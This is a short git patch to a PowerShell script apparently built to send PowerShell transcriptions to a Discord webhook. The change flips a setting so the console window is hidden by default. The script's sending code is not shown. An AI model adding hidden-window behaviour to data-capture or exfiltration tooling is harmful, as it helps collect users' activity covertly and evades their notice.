From 30d37eaaed3da84e4745afeb1ac341fd4c794870 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 3 Apr 2024 19:56:36 +0000 Subject: [PATCH] Update main.ps1 --- Global-PS-Trascription-to-Discord/main.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Global-PS-Trascription-to-Discord/main.ps1 b/Global-PS-Trascription-to-Discord/main.ps1 index 8998a26..a93a9ee 100644 --- a/Global-PS-Trascription-to-Discord/main.ps1 +++ b/Global-PS-Trascription-to-Discord/main.ps1 @@ -1,6 +1,6 @@ $webhookUrl = "$dc" -$hideWindow = 0 # 1 = Hidden +$hideWindow = 1 # 1 = Hidden [Console]::BackgroundColor = "Black" [Console]::SetWindowSize(60, 20)